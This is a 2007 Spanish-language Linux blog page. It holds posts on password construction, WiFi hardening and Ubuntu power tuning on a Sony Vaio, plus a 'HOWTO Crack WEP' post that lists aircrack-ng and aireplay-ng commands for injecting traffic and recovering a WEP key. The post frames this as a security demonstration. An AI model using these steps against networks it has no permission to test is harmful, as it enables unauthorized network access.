jueves, 30 de agosto de 2007

Cómo hacer contraseñas seguras

Nuestras contraseñas pueden ser adivinadas u obtenidas por ataques basados en diccionarios. Para proteger nuestros datos y recursos privados, debemos tener palabras claves que no puedan ser adivinadas y que no figuren en diccionarios.

A continuación unas recomendaciones para que nuestras contraseñas sean mas seguras:
Debes evitar usar fechas, nombres y palabras que estén en diccionarios.
Debes utilizar letras (mayúsculas y minúsculas), mezcladas con números y símbolos.
Debes utilizar contraseñas lo más largas posibles.
Debes cambiar las contraseñas periódicamente.

Dada la dificultad que puede involucrar recordar un password como 'ñF(fh3#"$j9', puedes usar la siguiente técnica para hacer menos arduo el trabajo:
Piensa una frase (de cinco o más palabras) que signifique algo para tí. En este ejemplo voy a usar 'Ladran, Sancho. Señal que cabalgamos.'. Luego toma un número de tres o cuatro dígitos que puedas recordar (yo usaré 1234). Ahora con todo eso, tomas la primer letra de cada palabra (una en mayúsculas y otra en minúsculas), y la vas alternando con los números. Si utilizas siempre el mismo tipo de teclado (o si conoces las distribuciones de teclado de memoria), puedes convertir los números en símbolos presionando la tecla 'mayúsculas'.
Siguiendo el ejemplo, mi palabra clave quedaría así:
L1s"S3q$C

Esto es una base, puedes alterar la idea, por ejemplo empezando por los números, o dos letras y un número, o que la letra sea la segunda letra de cada palabra, etc. Usa tu imaginación!

Ya tienes las bases para tener contraseñas seguras fáciles de recordar.

Saludos!
English version

Technorati tags:

lunes, 27 de agosto de 2007

Cómo hacer una red WiFi más segura

Decidí reunir una serie de recomendaciones para hacer más seguras las redes WiFi.

Tener en cuenta que todos los sistemas son vulnerables, sólo se trata de bajar el riesgo de ser vulnerado.

Divido las recomendaciones en dos partes: la del AP (Access Point) y la de la estación de trabajo.

En el AP

  • Cambiar el SSID por defecto. No conviene dejar aquellos que vienen de fábrica (ej: Linksys, 3COM, etc.)
  • Cambiar la contraseña del AP. Es relativamente fácil determinar el modelo del AP, y de ahí saber cuál es la contraseña del administrador por defecto.
  • Desactivar el broadcasting del SSID. Esto no agrega mucha seguridad, pero desalienta al 'hacker casual'.
  • Usar WPA o WPA2. No dejar la red sin seguridad. WEP es vulnerable (ver mi otro post http://www.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html), de todas maneras, si no se cuenta con WPA o WPA2, WEP es mejor que nada.
  • Filtrar por MAC Address. Si bien puede cambiarse la MAC de una placa de red, esto es más complicado para el común de la gente.
  • Desactivar DHCP. A menos que no sea posible, utilizar direcciones de IP fijas en la red.
  • Limitar el número máximo de IPs en el DHCP. Esto limitaría la cantidad de dispositivos que se conectan a la red (de todas maneras más dispositivos pueden agregarse con IPs fijas).
  • Apagar el AP cuando no esté en uso. Esto no siempre es posible. Para redes hogareñas, esta opción es buena, siempre y cuando uno no deje la estación de trabajo prendida para acceder a ella desde internet.
  • Cambiar las claves regularmente. Con el tiempo las claves pueden ser obtenidas. Cambiarlas regularmente es una buena práctica.
  • Limitar la potencia del AP. Esto es bastante efectivo, siempre es conveniente bajar la potencia al mínimo posible (verificando que el dispositivo más alejado pueda conectarse correctamente). Esto baja las posibilidades de conexión de dispositivos distantes (por ejemplo que estén en la calle).
  • Ubicar el AP adecuadamente. Conviene dejar el AP en el centro de la residencia, lejos de las ventanas y paredes exteriores (ver punto anterior).
  • Usar contraseñas seguras. Conviene usar palabras clave que mezclen letras (mayúsculas y minúsculas), números y signos. Si fuera posible, utilizar contraseñas enteramente aleatorias en hexadecimal.
  • Deshabilitar administración remota en el AP. Esto previene que alguien desde fuera de la red gane acceso al AP.
  • Activar el Firewall en el AP.

En la estación de trabajo

  • Verificar quién instaló el AP. Existen APs que están para captar el tráfico de red de las estaciones de trabajo. Debe verificar que sea un AP legítimo.
  • Navegando por internet no ingresar contraseñas o información sensible en páginas no seguras. Antes de ingresar números de tarjetas de crédito, contraseñas bancarias o de correo electrónico, verificar que la dirección del sitio que visita empiece con 'https://'.
  • No tener carpetas compartidas públicas. Esto es un error bastante común: dejar carpetas compartidas mientras uno se conecta a una red inalámbrica (pública).
  • Verificar tener un firewall activo. Cuando uno se conecta en redes WiFi públicas está expuesto al ataque de otras estaciones de trabajo dentro de la red.
  • Apagar la placa de red inalámbrica cuando no esté en uso. Más allá del obvio ahorro de energía, un atacante podría crear una red ad-hoc con la placa de red activa.
  • Utilizar una VPN. Si uno cuenta con una VPN (generalmente disponible en entornos corporativos), esto hace más segura la conexión de la estación de trabajo.

Siempre hay que recordar que 'sólo se lo estamos haciendo más difícil'. Tampoco es cuestión de hacérselos fácil ;-)

Estoy abierto a sugerencias para ampliar esta lista de recomendaciones.
Pueden mirar los siguientes enlaces también:

Saludos!

English version

Technorati tags:

HOWTO Crack WEP - Sony Vaio

Por una necesidad laboral, tuve que demostrar que WEP es falible. Aunque que yo 'sabía' que ésto podía hacerse, en la práctica nunca lo hice yo.

Nota: Esto es para fines de investigación, aprendizaje, y verificación de seguridad. No debe usarse para vulnerar redes de otras personas. Atacar y vulnerar redes (u otros recursos) es malo, e ilegal.

Investigando un poco, encontré que la placa de red de mi Sony Vaio VGN N350FE, una Intel 3945ABG, no permitía ciertas cosas desde linux, entre las cuales una de ellas era necesaria para poder demostrar esta vulnerabilidad.
Si leyeron mis posts anteriores, verán que no es el primer problema que encuentro con el hardware.
Tampoco es el primero al que encuentro solución :-)

Encontré un howto en http://foro.seguridadwireless.net/index.php?topic=3227.0 que usé como base.

A continuación, les explico los pasos que seguí para romper WEP.
Necesitamos una distribución de linux que podemos encontrar en http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. Bajamos la imagen del CD, y la quemamos.

Iniciamos la máquina con WifiWay (debe estar configurada para permitir iniciar desde CD/DVD).

Una vez iniciada, iniciamos el entorno gráfico mediante el comando:

startx

Ingresamos el canal en el que está el AP (Access Point) en la placa de red.

echo 'CANAL_DE_CAPTURA' > /sys/class/net/wifi0/device/channel

Obtenemos el BSSID, el canal, y el ESSID.

airodump-ng rtap0

Cerramos la ejecución con CONTROL-C, y utilizamos configuramos el BSSID (un número hexadecimal de 6 posiciones) en la placa de red.

echo 'BSSID_DEL_ACCESS_POINT' > /sys/class/net/wifi0/device/bssid

Una vez hecho esto, iniciamos la captura.

airodump-ng -c CANAL_DE_CAPTURA -w ARCHIVO_CAPTURA rtap0

Abrimos otra ventana y configuramos la velocidad a 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

Subimos la placa de red.

ifconfig wifi0 up

Averiguamos la MAC address, son los 12 primeros numeros de HWaddr

ifconfig

Iniciamos una asociación con el AP.

aireplay-ng -1 0 -a BSSID_DEL_ACCESS_POINT -h MAC_ADDRESS_WIFI -e ESSID_DEL_ACCESSPOINT wifi0

Abrimos otra consola y ponemos para inyectar tráfico.

aireplay-ng -3 -b BSSID_DEL_ACCESS_POINT -e ESSID_DEL_ACCESSPOINT -h MAC_ADDRESS_WIFI wifi0

Esto debería aumentar los #data en la ventana de captura (pasa un momento antes que empiece a aumentar).
Cuando tengamos mas de 100.000 podemos extraer la clave ejecutando:

aircrack-ptw ARCHIVO_CAPTURA.cap

Esto debería encontrar la clave de red en formato hexadecimal.

Nota: En todos los comandos anteriores, wordpress convierte automáticamente las comillas a comillas formateadas. Por favor usar comillas simples.

Espero, estimados lectores, que esto haya sido de utilidad.

Saludos!

English version


HOWTO Ubuntu Feisty + Sony Vaio VGN N350FE

Con algo de paciencia, buscando en foros, investigando, y una dosis de suerte, logré resolver el problema de energía de mi laptop: una Sony Vaio VGN-N350FE utilizando Ubuntu Feisty.
Advertencia al lector: si es tan audaz de realizar esto howto, tenga en cuenta que el sistema puede volverse inestable, inusable, o cosas peores, como dañar el hardware. Siga estos pasos sólo a su propio riesgo.
En una instalación limpia de Ubuntu Feisty actualizo todos los paquetes que me ofrece el gestor de actualizaciones.
Instalo el kernel 2.6.22.9 (disponible en la versión de Gutsy), para lo que necesitamos incluir los repositorios correspondientes.
En la línea de comandos ejecutamos:

sudo gedit /etc/apt/sources.list

Cuando nos abra el editor, agregamos las dos siguientes líneas al final del archivo.

deb http://archive.ubuntu.com/ubuntu/ gutsy main restricted
deb http://archive.ubuntu.com/ubuntu/ gutsy universe

Guardamos y cerramos. Ejecutamos lo siguiente:

sudo apt-get update

Luego de esto, es posible que el update manager nos ofrezca actualizar muchos paquetes (que en realidad son de gutsy). No debemos hacerlo. Sólo los consignados aquí deben ser instalados.
Ejecutamos:

sudo apt-get install linux-backports-modules-2.6.22-9-generic linux-headers-2.6.22-9 linux-headers-2.6.22-9-generic linux-image-2.6.22-9-generic linux-restricted-modules-2.6.22-9-generic linux-ubuntu-modules-2.6.22-9-generic

Como acabamos de instalar un nuevo kernel, creo que es buena idea reiniciar el equipo. Luego de iniciar nuevamente, abrimos la ventana Terminal y ejecutamos:

sudo apt-get install powertop cpufrequtils libncursesw5

Ahora debemos quitar los repositorios de Gutsy. Ejecutamos en lo siguiente:

sudo gedit /etc/apt/sources.list

Comentamos las líneas que insertamos con los repositorios anteponiendo el símbolo numeral ('#') al principio de las líneas.
Actualizamos el gestor de paquetes:

sudo apt-get update

Ahora nos aseguramos estén instalados los módulos de gestión de energía de sony. Ejecutamos lo siguiente:

sudo modprobe sony_acpi
sudo modprobe sonypi

Hacemos que dichos módulos se carguen automáticamente:

sudo gedit /etc/modules

En el archivo que se abre, agregamos las siguientes dos líneas:

sony_acpi
sonypi

Ahora ejecutamos esto para poder usar los controles de brillo:

sudo locate -u && for i in $(locate lcd-???-brightness); do sudo cp $i $i.bak; sudo sed -i '1 s|#!/bin/sh|#!/bin/bash|g' $i; done

Ahora podemos agregar el control de brightness al panel de gnome. Luego de esto, reiniciamos la máquina, y cuando volvamos, estará activo el control de brillo.
... y listo!
Cuando utilicemos la notebook con la batería, necesitamos ejecutar en un terminal:

sudo powertop

Esto ejecuta una aplicación (en inglés y modo texto) que nos va diciendo qué elementos están consumiendo energía, y nos recomienda llevar a cabo ciertas acciones para mejorar el uso de la batería.

Siguiendo esto, pasé de que la batería me dure menos de media hora a más de cuatro horas.

Para referencias, me basé en los siguientes posts:

http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html
http://ubuntuforums.org/showthread.php?t=479034
http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/

Saludos!

English version


Technorati tags:

Poniendo a punto mi notebook

Recientemente compré una notebook Sony Vaio VGN-N350FE.

En mi home-office tengo una impresora láser color HP 2600n, y con mi flamante notebook, no puedo imprimir. El Windows Vista me tira un error de "Data Execution Prevention" y se muere el servicio de spool de impresiones (previo a esto, jamás tuve problemas - ni con Windows XP, ni con ubuntu).

Busqué en google a fondo, y no hay solución. Parece ser un problema de compatibilidad entre los drivers de HP y la nueva versión de Windows.

Esto (y otros motivos) me hacen decidir instalar ubuntu feisty en esta máquina. Todo es fantástico, excepto el tema de la administración de la energía. No andan las teclas de función del teclado, y si bien probé lo que proponían algunos tutoriales, no me sirvió (aparentemente tengo un modelo muy nuevo).

Así que mientras tanto si uso Windows, no puedo imprimir, y si uso Linux, la duración de la batería deja mucho que desear...

Les aseguro, estimados lectores, que esto continuará.


English version

domingo, 26 de agosto de 2007

Primer paso

Hola!
Este es el primer post tuxero, con muchas expectativas y ganas.
Este es un saludo cortito, ya que lo principal de este blog es el contenido, no la introducción.
Pronto, pronto, estaré agregando contenidos.

Saludos!

English version